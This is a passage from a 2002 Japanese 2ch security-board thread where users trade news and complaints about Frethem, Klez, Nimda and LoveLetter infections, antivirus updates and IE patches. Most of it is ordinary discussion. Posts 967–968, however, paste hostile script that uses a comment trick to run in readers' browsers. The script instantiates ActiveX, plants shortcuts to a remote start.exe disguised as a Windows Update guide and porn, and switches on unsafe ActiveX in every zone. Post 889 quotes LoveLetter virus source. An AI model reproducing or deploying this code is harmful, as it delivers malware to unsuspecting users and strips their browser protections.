822 :名無しさん@お腹いっぱい。:02/07/15 18:09
>>820
うざい
他の板へいけ

823 :名無しさん@お腹いっぱい。:02/07/15 18:11
トレンドマイクロのアップデートまだかよぉ。
予定より1時間以上遅れてるぞ。メールサーバが動かせん。

824 :名無し:02/07/15 18:11
え?ちょっと意味不なんですけど。捕まるのか捕まらないのか答えてもらいたいです。

825 :名無しさん@お腹いっぱい。:02/07/15 18:12
ウィルスと関係ないだろ
http://www.keishicho.metro.tokyo.jp/anket/haiteku.htm
ここで聞け。

826 :名無しさん@お腹いっぱい。:02/07/15 18:14
>>824
お前のたいーほよりも定義ファイルのほうが心配だ


827 :名無しさん@お腹いっぱい。:02/07/15 18:19
>>780

NAVCEの最新版だと対応してるっぽいぞ
LiveUpdataはまだだが

828 :名無しさん@お腹いっぱい。:02/07/15 18:21
今時プレビューで感染してる奴は即死して欲しい。

829 :名無しさん@お腹いっぱい。:02/07/15 18:42
WORM_FRETHEM.K 対応のパターンがトレンドから出ますた
パターンは317です

830 :829:02/07/15 18:43
http://www.trendmicro.co.jp/vinfo/#pendingMed

831 :829:02/07/15 18:48
uso desita
gomen nasai . . .

832 :名無しさん@お腹いっぱい。:02/07/15 18:54
パターン317age

833 :名無しさん@お腹いっぱい。:02/07/15 18:56
なんかすり抜けてない???


834 :829:02/07/15 18:59
>>
imasara...

835 :834:02/07/15 19:00
>>833
のことです

836 :名無しさん@お腹いっぱい。:02/07/15 19:06
>>833
漏れがトレンドに解析依頼した検体2個のうち片方は、パターン317でも
検出しなかった・・・。
だめぢゃん。

837 :cheshire_cat ◆CATJR.v6 :02/07/15 20:14
>>836
なんだかファイルサイズが異なるのがいきなり出てますね。
メル送信以外の機能が無いように祈りまする。

838 :名無しさん@お腹いっぱい。:02/07/15 20:38
オレのところにきたやつは48640bytesだった。
トレンドのオンラインスキャン(パターン317)では検出してくれなかった


839 :cheshire_cat ◆CATJR.v6 :02/07/15 20:44
>>838
Symantecだと47,616 バイトだけど。
うちに届くのって、添付ファイル45KB台のが多い。
ファイルサイズが大きいってのは、どゆ機能が追加されているのかドキドキっすね。

840 :名無しさん@お腹いっぱい。:02/07/15 21:05
FRETHEM.E専門スレたちました。
http://pc.2ch.net/test/read.cgi/sec/1026734507/l50

841 :名無しさん@お腹いっぱい。:02/07/15 23:39
W32.Frethem.J@mm
これ、オラクルから来たヤシいる?

842 :名無しさん@お腹いっぱい。:02/07/16 01:09
Frethem.kきたけど、
オンラインスキャンしたら一度すり抜けた。
そんなはずないだろと思って
テンポラリのディレクトリを直接スキャンしたら
なんとか検出してくれた。
いい加減だな、オンラインスキャンって。

843 :名無しさん@お腹いっぱい。 :02/07/16 01:25
さっきから窓の杜から、ウィルスきまくりなんですが・・
偽装にしても多すぎ。

844 : :02/07/16 02:08
>>841
んなもんに頼ってんじゃねーよ タコが

845 :sage:02/07/16 05:04
>>844 オラクルには頼るなと??




846 :-:02/07/16 06:04
VINCENT_67@HOTMAIL.COM

847 :名無しさん@お腹いっぱい。:02/07/16 13:08
添付ファイルがあるやつと無いやつがあるけど無いのも危険?

848 :感染しちまいました:02/07/16 14:46
普段マックを使っているのですが、winを実家で初めて使っています。
オンラインチェックをしたらウイルスが発見されました。
メールソフトは設定もしていないし、送受信もしていない(webメールのみ)のに
感染してしまいました。変な添付メールは一度も来てません。こんな事ってあるのでしょうか?

VBS.LoveLetter.A というやつです。過去ログにはファイルを削除、とありましたが
どれを削除してよいのかわからないので、ウイルスバスターを買う事にしました。
これはwebメールでも感染してしまうのでしょうか??マックにも感染しますか?

ウイルスをばらまいたと思うと心配で夜も眠れません

849 :名無しさん@お腹いっぱい。:02/07/16 14:53
>>848
http://pc.2ch.net/test/read.cgi/sec/1026717316/


850 :名無しさん@お腹いっぱい。:02/07/16 15:41
>>848
http://pc.2ch.net/test/read.cgi/sec/1025872269/を参照。

それはただ単にノートンが過敏に反応してるだけ。

851 :感染しちまいました:02/07/16 19:14
すんませんでした。でもウイルスバスターは買います。。

852 :名無しさん@お腹いっぱい。:02/07/17 02:05
スペイン語のメールがやたらと来るんだけどこれってなんなんすかね?
決まって大きさが313Kなんです。

853 :名無しさん@お腹いっぱい。:02/07/17 08:24
>>852 アンチウィルスソフトいれてないのか。
アンチウィルスが反応しなかったら、単なるスパム。

854 :名無しさん@お腹いっぱい。:02/07/17 10:37
frethemとかメール勝手に送って増殖する奴に
かかって取引先から苦情が来てる人が職場にいるんだけど

そういうのを見ると
アドレス帳は別のところに保存しといた方がいいんですか?
でも調べてみたらアドレス帳載ってる人以外にも
送ってるみたいだし。
なにかいい対応策ありますか?

855 :名無しさん@お腹いっぱい。:02/07/17 10:42
そういう奴は隔離ネットワークに収監する。

856 :名無しさん@お腹いっぱい。:02/07/17 11:01
ははは。
でも笑いごとじゃなくてウイルス駆除ソフトで対応する前に
ウイルスにかかってしまうことは考えられることなので、

最低限他の人には広めさせたくないっていうようにしたい。
ウイルス自体にメアドを参照させないようにするっていうのは
どうすればいいんだろうか。

それか自分以外が送信できないようにすればいいのかな。
パスワドかけるとかして。

857 :名無しさん@お腹いっぱい。:02/07/17 11:06
プレビューしただけで感染するのはなぜ?
プレビューって、勝手に添付のexe実行しちゃうの?

858 :名無しさん@お腹いっぱい。:02/07/17 11:07
>>857
exeだけがプログラムじゃないの。
Webページを表示するのだって…と考えてみれば?


859 :名無しさん@お腹いっぱい。:02/07/17 11:08
>>856 最近のウィルスは自前で送信するのでメーラにパスワードかけても意味ないです。
メアドもPC内を検索するのでどこに置いても参照されうる。
>>855が最善の策と思うが。ダブルクリック厨にはつける薬無し。

860 :名無しさん@お腹いっぱい。:02/07/17 11:12
>>857 Internet Explorerのセキュリティホールを利用しているから。
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メール
の添付ファイルを実行する 《MS01-020》」
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms01-020.asp

861 :名無しさん@お腹いっぱい。:02/07/17 11:15
>>856 最大のセキュリティホールは無自覚なユーザなのだよ。
そしてセキュリティの固さはもっとも弱いところで決まるので、

馬 鹿 が い る 限 り 何 を やっ て も 無 駄。

862 :名無しさん@お腹いっぱい。:02/07/17 11:15
>>858
FRETHEM.Kはexeが添付されてるんでしょ?
なぜ、プレビューで実行されるんかな?

863 :名無しさん@お腹いっぱい。:02/07/17 11:19
>>862 >>860

864 :名無しさん@お腹いっぱい。:02/07/17 11:24
>>859
>メアドもPC内を検索するのでどこに置いても参照されうる。

↓こんな感じのフラッシュメモリにアドレス帳入れておけばいいのかな?
http://www.iodata.co.jp/products/pccard/2002/usb-ed2.htm

865 :名無しさん@お腹いっぱい。:02/07/17 11:26
あっ遅かった。
>>860>>863
どうもです。

866 :名無しさん@お腹いっぱい。:02/07/17 11:26
この穴がいまさら突かれるのは購入時のまま使用しているユーザがとても多いという事でいい?
とすると、数ヵ月後にそういうユーザが貯まったところで、また流行?

867 :名無しさん@お腹いっぱい。:02/07/17 11:29
>>864 USBポートに差しっ放しにしなければ大丈夫だろうが、ウィルスは
ブラウザのキャッシュからもメアド拾うので感染したらどこかしらへは
送信してしまうだろうね。送信先はアドレス帳だけではないということ。

868 :名無しさん@お腹いっぱい。:02/07/17 11:30
IEコンポーネント使用メーラーはOEとBeckyの他、なにがありますか?

869 :名無しさん@お腹いっぱい。:02/07/17 11:31
NTTからfrethem飛ばしてスマソって電話がかかってきた

870 :名無しさん@お腹いっぱい。:02/07/17 11:32
>>866 アンチウィルスソフトで駆除したら終わり、じゃなくてIEのバージョン
アップもきちんと指摘・指導して欲しいね。>マスコミ各社
たしかにこれじゃ繰り返しだよ。

871 :名無しさん@お腹いっぱい。:02/07/17 11:33
>866
新規購入者だけとは限らん。
klezの時だって、「ウィルスメールなんて一通も来なかったよ。
セキュリティホール?パッチ?ワクチンソフト?何のことかサパーリワカラソ」
と平気でのたまうヤシはそこらへんにうじゃうじゃいる。



872 :名無しさん@お腹いっぱい。:02/07/17 13:06
>>869
>NTTからfrethem飛ばしてスマソって電話がかかってきた

どこを見ればfrethemの送信先ってわかるだろう。
教えてほしいす。
OEの送信済みアイテムには無いし。

873 :名無しさん@お腹いっぱい。:02/07/17 13:09
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ???
HDD起動不能になるとは・・・。


874 :名無しさん@お腹いっぱい。:02/07/17 13:17
>>873 マルチウザイ http://pc.2ch.net/test/read.cgi/sec/1013661431/658
お前出品者か?

875 :名無しさん@お腹いっぱい。:02/07/17 13:27
>>872
>OEの送信済みアイテムには無いし
いまどきそんなこと言ってるようじゃ・・・
【流行の】Frethem【ヨカーン】
http://pc.2ch.net/test/read.cgi/sec/1026734507/で情報交換してみたら


876 :名無しさん@お腹いっぱい。:02/07/17 13:41
>>874
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ???
HDD起動不能になるとは・・・。


877 :名無しさん@お腹いっぱい。:02/07/17 13:42
>>876 市ね

878 :名無しさん@お腹いっぱい。:02/07/17 13:44
>>877
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ???
HDD起動不能になるとは・・・。


879 :名無しさん@お腹いっぱい。:02/07/17 13:57
>>872
大手企業ならSMTPを自前で持ってるんだから
ログ見りゃわかるじゃん。

つうかOEのワーム系ウィルスって
ほとんど対策済みのセキュリティホール突いてるんだから
パッチくらいちゃんと当ててくれ

俺はOE使ってないからそんなん知らんとかじゃなくてさ


880 :名無しさん@お腹いっぱい。:02/07/17 14:01
>>876,878

ほんとにウィルスだと思ってんの?
それともネタか?

富士通製ハードディスク まだ続く?突然死 3台目
http://pc3.2ch.net/test/read.cgi/jisaku/1019133758/
この辺見とけ

881 :名無しさん@お腹いっぱい。:02/07/17 14:20
>>880
http://page2.auctions.yahoo.co.jp/jp/auction/b25335174

↑これは何のウィルスにやられたんだろ???
HDD起動不能になるとは・・・。

882 :名無しさん@お腹いっぱい。:02/07/17 17:09
パッチ当ててればプレビューしても感染しないの?

883 :名無しさん@お腹いっぱい。:02/07/17 17:16
>>882 >>860

884 :名無しさん@お腹いっぱい。:02/07/17 17:19
>>883 これもな
Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-009.asp

885 :名無しさん@お腹いっぱい。:02/07/17 18:47
実行されたアクション:
添付ファイルはメッセージから隔離され、受信者が実行したアクションを通知するテ
キスト ファイルに置き変えました。

宛先:
compath-ml-secret@hippo.metal.reedrex.co.jp
<compath-ml-secret@hippo.metal.reedrex.co.jp>

送信者:
arak@mug.biglobe.ne.jp <arak@mug.biglobe.ne.jp>

送信時刻:
709959936,29502659

件名:
Re: Your password!

添付ファイルの詳細:-

添付ファイル名: decrypt-password.exe
ファイル: decrypt-password.exe
感染? はい
修復済み? いいえ
ブロック済み? いいえ
削除済み? いいえ
ウイルス名: W32/Frethem.l@MM




こんなメールが着たんだけどなんですか?


886 :名無しさん@お腹いっぱい。:02/07/17 19:05
http://game.2ch.net/test/read.cgi/ff/1026491502/
このスレに入ったらLoveletterウイルスに感染されちゃうんだけど。
どうにかして。

887 :名無しさん@お腹いっぱい。:02/07/17 19:07
>>886 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

888 :名無しさん@お腹いっぱい。:02/07/17 19:08
ということは安全ってことですね。
ヨカター

889 :名無しさん@お腹いっぱい。:02/07/17 19:09
c.Copy(dirsystem&"\重複.TXT.vbs")

890 : :02/07/17 19:11
覚えたてでうれしいね。

891 :       :02/07/17 19:48
       

892 :七誌:02/07/17 19:51
ttp://tmp.2ch.net/test/read.cgi/kitchen/1026902739/

DELALLについての、詳細です。

893 :ウイルス:02/07/17 20:25
ウイルスがホットメールで送られてきました。なんか、スペイン語で
メールが送られてきます。ホットメールって添付ファイルが自動的に
ウイルスチェックされるので無用心ながらも添付を開いてしまい、
感染してしまった模様です。ちなみに、その添付ファイルは225Kバイト
くらいです。消しても消しても<30>というファイルがでてくるし、
<BanderaNegra>って言うファイルも作られます。それも、c:\にです。
どなたか対処方法を御存知の方はいらっしゃいませんでしょうか?
トレンドマイクロ社の30日つかえる無料のウイルス検知ソフトを
入れてみたのですが、ウイルス除去できないみたいなのです。隔離しか。


894 :名無しさん@お腹いっぱい。:02/07/17 20:25
>>885
ワタシのとこにもきました

発信もとはお詫びしています

ttp://www.reedrex.co.jp/mail_t.htm


895 :893:02/07/17 20:40
どなたか、対処方法をおしえてください。おねがいします。

896 :名無しさん@お腹いっぱい。:02/07/17 20:48
このスレ、かちゅで見れないぞ〜
「削除かあぼーんでログが詰まった可能性がありますです」
になってしまって、新しいdll当てても見られない。
ブラウザで開くと見れるんだが・・・・

897 :893:02/07/17 20:54
zonavirus.dll
っていうファイルもみつかりました。
ゾナウイルスっていうらしいです。どなたか、ほんとによろしくお願いします。

898 :名無しさん@お腹いっぱい。:02/07/17 21:06
>>896
スレ違いネタだな。一回ログ消して全部取得しなおせ

>>897
そこまでわかってんなら検索すればすぐだろうに
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_ARGEN.A


899 :893:02/07/17 21:08
>>898
ありがとうございます。今検索して、知り合いに僕からのメールは
開かないようにメール送ったところでした。

900 :896:02/07/17 22:01
>>898
おぉ!読めたぞよ。ありがとさん。

901 :これってなんでしょうか?:02/07/18 01:56
ご回答よろしくお願いします。
この質問をソニーの社員スレッドでしたのですが全然回答がありませんでした。
重大な秘密でもあるのでしょうか?
私はVAIOを使ってます。
最近監視ソフトを買いました。
毎日インターネットつなげるとアタックの警告音とともにVAIOの方から勝手に
パソコンの中に何度も進入してきます。
私のパソコンの中でいったい何をしているのでしょうか?
ソニーさんのパソコンを使うと勝手にパソコンに侵入してこれるように
何かしているのでしょうか?
侵入の警告音がなりっぱなしで気持ち悪いです。

902 :名無しさん@お腹いっぱい。:02/07/18 02:04
>>901
ソニィ社員だが、何か?
おまいの言っていることがサパーリわからん。
まともな者にわかるよーにしっかり述べよ。

903 :詳細が分からんと答えられん。:02/07/18 02:05
>>901

904 :名無しさん@お腹いっぱい。:02/07/18 02:26
>>902
901です。
ソニィ社員、おまいとか言うような方が本当に有名な
ソニーの社員の方かどうかわかりませんがよろしくお願いします。
私も何が起こっているのかわかりません。
パソコンへの不正侵入を監視するソフトをインストールすると
VAIOさんへ繋いでいないのに
以下のような表示が出て警告音が鳴らされます。

パソコンへの侵入者を監視するソフトの表示です。

アタック Ping Sweep
侵入者 VAIO
IP: *.*.*.* DNS: VAIO

IPがいろいろ変わってきます。
必要ならIPも掲載します。

905 :名無しさん@お腹いっぱい。:02/07/18 02:33
YAVAIO

906 :893:02/07/18 02:37
さっき質問させて頂いてものですが、削除できません。
レジストリの所を書いてある通りにいじりたいのですが、
書いてあるもの自体がありません。

これを書かないと分からない!
って言う方がいらっしゃると思いますので、まずは何から書けばいいのか
お教えください。

907 :名無しさん@お腹いっぱい。:02/07/18 02:38
>>904
たのむから、sageにしてくれ(w
ttp://vcl.vaio.sony.co.jp/
あたりに、そのワケワカラン「ご相談」を投げてくれYO。
ココはなぁ、そんな糞質問を受け付けるところじゃ…(フゥー

908 :名無しさん@お腹いっぱい。:02/07/18 03:23
>>906 = やくざ
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
にある項目と値全部。

>>907
コピペしてもsageられないような事を書くなよ。

909 :893:02/07/18 04:21
>>908
(既定) (値の設定無し)
というのがあって、これだけ削除できません。。。
「指定された値を全て削除できません」とでます。
なんか、悲しくなってきました・・・。

910 :893:02/07/18 04:26
>>909
・・・これって残って当然ですね。
全部消したんですが、まだ再起動して立ち上げると
c:¥にあるんですよ。。。。どうしてでしょうか?

911 :898:02/07/18 04:47
>>910
あのさ、おれがだしたURLのとこ、ちゃんと読んだか?
読んでないよな?最後までちゃんと読めよ?
書いてあること、全部やったか?
やってないよな?だから復活するんだぜ?
わかったらもう一回いってきな。



912 :名無しさん@お腹いっぱい。:02/07/18 04:54
HKLMもと思ったけど。なんか殺伐としてんな。

913 :893:02/07/18 05:17
http://www.symantec.com/region/jp/sarcj/data/w/w32.kitro.d.worm.html
こっちも調べました。状況的にはこっちっぽいので。
両方のサイトとも調べたんですよ、、、で、消しても出てくる。その繰り返しです。
書いてある通りにしたんですが、なかなか消えてくれないんです。

914 : :02/07/18 06:33
気になることがあるのですが、Dのプログラムフォルダーが縮小表示
の画像と画像なしで点滅状態になってるのと指定していない画像が
縮小表示で別のホルダーに表示されます。もう一つは他のプログラム
から利用されていますと出て削除できないファイルがあるのですが
原因わかる方いますか?

915 : :02/07/18 06:55
ファイル名を指定して実行の表示がregeditのままで消しても
表示されます。オートコンプリートはオフにしてるのですが
なぜでしょうか?

916 :名無し~3.EXE:02/07/18 07:40
レジストリのRUNにMSPY2002というのがありますが
これ大丈夫ですか?IME調子悪いのですが。

917 :名無しさん@お腹いっぱい。:02/07/18 08:51
>>914
読んでも症状はさっぱり分からないが、
ウイルスが心配なのならちゃんとスキャンする。
エクスプローラその他の表示や、削除できないファイルとかに
ついては、
http://homepage2.nifty.com/winfaq/
で確認しる。

>>915
それはWindowsの仕様。
ひょっとしたら変更する方法もあるかもしれないが、
Windows板のOSごと質問スレにでも逝ってくれ。

>>916
ウイルスなどが心配ならスキャンする。
スパイウェアが心配ならad-awareのスレに。
IMEについては辞書の修復してみたら?

918 : :02/07/18 09:12
>917
どうも答えてくれるとはありがとうございました。
915と916についてはなんでもないことがわかりました。
914だけはどうも解せない。DとCにXP一個ずつ2ついれてて
Dの方がNAWインストール失敗して動かないんですよ。cのほうからだと
アドミニの権限がないので全システムのスキャンができないし。
Cは調子いいのでDのほう削除してC一本にしたほうがいいですか?

919 :名無しさん@お腹いっぱい。:02/07/18 10:53
>>918
>914〜916については、ちゃんとまとめてから環境と状況を
明確にして質問してくれ。せめて同一人物と分かるように
名前なりなんなり工夫してくれ。
で、それらと>918を併せ読んでも、なおかつ状況は明確でない。
一度、あんたが何を使ってどうしているのか全然知らない他人が
その文章だけでどれだけ理解できるかという「他人の目」で
読み返してくれんか。
NAWはNAVなのかなあ、とか、アドミン権限もなくて
一体何がしたいのかとか思う程度。
これじゃ、Windows板に誘導したものかどうかの判断もつかない。

920 :名無しさん@お腹いっぱい。:02/07/18 11:03
あのあるアドレスをクリックしたら、へんなページがいっぱい出てきて
ノートンでTrojan Horseに感染しています。って表示されたのですが、
やばいですかね。

921 : :02/07/18 11:30
>919
アドミン権限が二つ別であるから、CのXPからDのXPは
スキャンできないんですよ。2つ入れたのは比較の目的から。
それくらいわからないか。



922 :898:02/07/18 11:42
>>913
そうか、すまんな、一応調べたんだな。
で、消しても復活してくるからには、消しきれてない上に
Windows起動時にどっかから読まれてるわけだが、
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Runの
記述を消しても現れるなら、WIN.INIやSYSTEM.INI,とかに仕込まれてたりしないか?
SAFEモードで起動してMSCONFIGでチェックしたらどーだ?
それと、こいつの本体はVBSなので、ActiveDesktopで呼び出されても発動するだろうな。

923 : :02/07/18 11:52
具体的には
D:\Documents and Settings\XXX(1)\My Documents\新しいフォルダ
をwipe infoで消したら、一つ消えないファイルがあって容量ゼロで
新しいフォルダが消えないという状態。DOSで消せと書いてるけど
この場合だとどう打ち込んだらいいのか具体的に書いてないから
こっちこそわからない。だいたいコマンドプロンプトまとめずわかるように
書けっつーの。学んでない人間のほうが多いんだそ。


924 : :02/07/18 12:26
>>921
>>919の「同一人物が分かるように」との指摘さえきかず、
好き勝手なところだけ答えて逆切れしているし。

>>923
誰に文句いってんだよ、コイツ?

>919はキツイ面もあるかもしれんが、まだしも好意的に
このように質問しろと書いてくれているんだが、
それでも>921みたいに逆切れするのとか、>923みたいに
意味不明の独り言を書き込むようなヤカラには
もう無視っきゃないな。
放置されたくなければ、質問の仕方を考えろ。

925 :名無しさん@お腹いっぱい。:02/07/18 12:31
受難の季節

926 :通りすがり:02/07/18 12:54
(´-`).。oO(大変だなぁ)

927 :名無しさん@お腹いっぱい。:02/07/18 13:16
(´-`).。oO(DQNでも最初から放置はせずに一応は答えてくれるんだね・・・)

928 : :02/07/18 13:19
>>921,923
つーかウィルスじゃねえから
http://pc.2ch.net/pcqa/
ここ逝けよ、夏厨くん

それと文章はわかるように書いてね

929 :名無しさん@お腹いっぱい。:02/07/18 15:07
ウィルススキャン シタラ コンナンデマシタ!

「¥katjusha2102\log\cocoa.2ch.ne\4649\1026258903.dat
VBS.Internalウィルスに感染しています。」

ナンジャコリャ? デス!


930 :名無しさん@お腹いっぱい。:02/07/18 15:08
ぼえーん
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

931 :名無しさん@お腹いっぱい。:02/07/18 17:43
ノートンでTrojan Horseに感染しています。って表示されたのですが
どんな症状がでるのですか?


932 :名無しさん@お腹いっぱい。:02/07/18 17:50
>>931 >>920 http://pc.2ch.net/test/read.cgi/sec/1026717316/191-192

933 :名無しさん@お腹いっぱい。:02/07/18 22:29
KLEZ.Hとやらに感染してました。
昨日やっとやっつけました。
けど、奇数月の6日になるまで安心できないと
脅されました。9月までワカンネーノカヨ(#・∀・)

934 :名無しさん@お腹いっぱい。:02/07/18 22:48
ApacheのLogに残るニムダやコードレッドがうざいのだが・・・
こいつらを駆逐出来るような
CGIは作れないだろうか?

ちなみにIISではないので実害はナシ

935 :おそねっ:02/07/18 23:00
くだらねぇ質問はここに書き込め Ver2.18…に書きこんだのですが、
ちゃんと教えてくれません。もー

初心者ですが、宜しくお願いします。

AVGってFreeのウイルス駆除アプリをインストールしています。
先日、WEB検索中に"I-Worm/NIMDA.A.HTM"に感染してしまいました。
AVGで駆除した後に、MSのfixnimdaを実行したのですが、正常に
駆除されているか心配です。
I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名を教えてください。
また、I-Worm/NIMDA.A.HTMに感染したら、どのような動作をするの
でしょうか?教えてください。


936 :名無しさん@お腹いっぱい。:02/07/18 23:10
>>935
少し検索すればすぐわかるようなこと聞くな、このヴォケ!

937 :名無しさん@お腹いっぱい。:02/07/18 23:19
>936
調子に乗るなヴォケ!
初心者だろうが上級者だろうがここは聞きたい奴がくるところだ
おまえは知識があるだろうが、暇人で傲慢だ
気分が悪い
おまえが出て行けばすむことだ 来るな ヴォケ!


938 :名無しさん@お腹いっぱい。:02/07/18 23:24
>>937
じゃあおまえが935に教えてやれ。

939 : :02/07/18 23:25
>>935
初心者なら初心者板行けよ

940 :名無しさん@お腹いっぱい。:02/07/18 23:28
>>938
まだいたのか?
あなたのように知識が豊富でないから教えられません。
出て行くか教えるかしてやれ



941 :おそねっ:02/07/18 23:31
937さん有難うございます。
番号の前に>>の名無しさんは、お願いですから、かきこまないでください。
NIMDA.○にもいろいろあるので、I-Worm/NIMDA = I-Worm/NIMDA.A.HTM
なのか自信が無かったのです。
ウイルス初感染なうえに知識が乏しいため、MSNでI-Worm/NIMDA.A.HTMを検索
して2CHにのみヒットした為、ここにきて聞きました。
ちょっと私も936さんに不満なもので、長々と書いてしまいました。
良識の有る方、お願いします。おしえてください。

942 :名無しさん@お腹いっぱい。:02/07/18 23:32
>>940
だから検索するだけだよ。早くしてやれよ。

943 : :02/07/18 23:34
質問者もどんくさいな

944 :名無しさん@お腹いっぱい。:02/07/18 23:36
>>942
ひきこもりだな
パソコンの世界で逝きとけ

945 :名無しさん@お腹いっぱい。:02/07/18 23:37
ウィルスに関わる話題・質問はこちらに、、、
※ただしここは心の狭いお偉いさんたちが暇してるので
質問は高度なものに限ります。
又は質問するな。
って但し書きが必要ですね。

946 :IP携帯電話:02/07/18 23:37
dle <dle@bdemaln.p> zerohour <zerohour@0-hourshop.com>

947 :名無しさん@お腹いっぱい。:02/07/18 23:38
>>944
引きこもりですが、何か?

948 : :02/07/18 23:38
>>945
必要なし

949 :名無しさん@お腹いっぱい。:02/07/18 23:40
http://pc.2ch.net/test/read.cgi/sec/1026717316/224
2〜3時間レスがないからといって逆ギレする初心者はお断りです。

950 : :02/07/18 23:40
ネタ歓迎〜★

951 :おそねっ :02/07/18 23:40
くだらないことで言い合ってないで、私の質問に答えなさい。
どうせ暇なんでしょ。

952 : :02/07/18 23:42
>>951
このスレ1から読み返しなさいな。
それで解決する。

953 :おそねっ:02/07/18 23:44
942さん、
I-Worm/NIMDA = I-Worm/NIMDA.A.HTM であっているのですね。
それならば、I-Worm/NIMDAでの処置は終了しています。
違っているのならば、別の検索のしかたを教えていただきたいです。

954 :  :02/07/18 23:44
>>I-Worm/NIMDA.A.HTMってウイルスの一般的な呼び名
ニムダだろ。
あとは検索すればちゃーんと詳しく書いてあるHPが出てくるはず。


955 :>>953:02/07/18 23:53
違うけど処置は終わり。お疲れ。さよなら。


956 :名無しさん@お腹いっぱい。:02/07/18 23:53
最近、2chを見てると、
よくウィルスソフトから
ラブレターウィルスの警告が出るんだけど、
みなさんはどうですか?


957 : :02/07/18 23:54
>>956
理由を知っているからなんとも思わない。
マルチの方がウザイ。

958 :おそねっ:02/07/19 00:00
954さん、
ありがとうございました。
これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
では、おやすみなさい。

959 :おそねっ:02/07/19 00:03
955さん?
駆除とMSのfixnimda実行だけでは、いけないのでしょうか?

960 :名無しさん@お腹いっぱい。:02/07/19 00:11
あれ?初心者の味方諸君はどこ行ったんだ?
>>949を見て萎えたのか?

961 :通りすがりでムっと。:02/07/19 00:38
>>959
だから質問する前に調べろ(検索しろ)と皆言ってるだろ!!
だから無視されるんだ。新しいウィルスじゃあるまし。
AVGならスレ違い。どうしてもあれこれ知りたいなら有償ソフト買ってメーカに
質問しろ。フリーを使い続けるなら自己責任でやるのは当然のことだ。

ttp://www.google.co.jp/search?hl=ja&inlang=ja&ie=Shift_JIS&q=fixnimda+%8B%EC%8F%9C&lr=


962 :名無しさん@お腹いっぱい。:02/07/19 00:49
>>960
ひきこもりが強がってら
弱虫は相手にされねーだけだろ
暇じゃねーんだよ ヴヲケ

963 :名無しさん@お腹いっぱい。:02/07/19 01:03
(´-`).。oO(書き込みする暇はあるんだな・・・)

964 :名無しさん@お腹いっぱい。:02/07/19 03:11
atamano yowasouna natutyu- dana...
syosinsya ita atari kara nagarete kitano kana-

965 :通りがかりでムっと。:02/07/19 11:00
>>963
質問に対して回答する際、自分の記憶違い等も考慮し、調べなおしたりするのは
当たり前のこと。
例えば952が「このスレ1から読み返しなさいな。」といってるが、これで解決
できるのは確認してると思う。(これは推測だけど。)
俺なら、書き込む前に、確実に確認する。
たった1行の回答であっても、それなりの時間はかかるはず。それを理解できない
お前は回答したことがないか、いいかげんな回答をしたことがないかだろ。

>960、>おそねっ
初心者だから皆怒ってるんじゃなくて、モラルを欠いた言動をとっているから
怒っているのがわからないのか?
例えばウィルスの名称なんて、1でリンクしてるURLを見てくるだけでもわかるだろ。
「ウィルス情報」って書いてあるんだから。
(ちなみにネットワークアソシエイツのウィルス名検索では、nimdaの情報が一部リンク
 はずれている。)

>これで帰ってねむれます。だったら、明日の仕事にも影響なさそうです。
こんなのも本論、第三者である俺達とは関係ない。
自分のとった言動を正当化するために書いてるだけ。
この手のスレは自己中心的に質問し、自分だけが役に立てばいいのでなく、
これをみている他の人にも役立つように考慮するのは当然のこと。
(だからこそ、952の「このスレ1から読み返しなさいな。」というのが生きてくる。)

本論と関係ないカキコして、皆スマン。


966 :963:02/07/19 13:26
(´-`).。oO( >>962あてだったんだが、ちゃんと書いとけばよかったな・・・)

967 : :02/07/19 18:47
</scri-->

<!--ipt
i="P";document.write("<AP"+i+"LET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </A"+i+"PLET ");

var label8="ウィンドウズアップデトガイド 2002年";
var url8="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile8="%WinDir%\\System\\User.exe";
var iconum8="4";

var label="無修正AV画像";
var url="http://kanazawa.cool.ne.jp/pressing101/primera/start.exe";
var icofile="%WinDir%\\System\\User.exe";
var iconum="1";

function savefavfile(folder,label,url,icofile,iconum){
var oFi=FSO.CreateTextFile(folder+"\\"+label+".url");
oFi.WriteLine("[InternetShortcut]");
oFi.WriteLine("URL="+url);
oFi.WriteLine("Modified=806188A46609C1013E");
oFi.WriteLine("IconIndex="+iconum);
oR=/%windir%/i;icofile=icofile.replace(oR,WinDir);
oFi.WriteLine("IconFile="+icofile);
oFi.Close();
}

function putfav(folder, folder2, folder3){

// savefavfile(folder3,label8,url8,icofile8,iconum8);
savefavfile(folder,label,url,icofile,iconum);

savefavfile(folder,"おまんこ無修正ネットアイドル","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","%WinDir%\\Mplayer.exe","3");
savefavfile(folder,"ファック無修正画像・映像","http://kanazawa.cool.ne.jp/pressing101/primera/start.exe","C:\\Program Files\\Internet Explorer\\Iexplore.exe","16");
}

968 : :02/07/19 18:48
function SetSrch(){


Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\1004", 00,"REG_DWORD");
Shl.RegWrite("HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\1004", 00,"REG_DWORD");
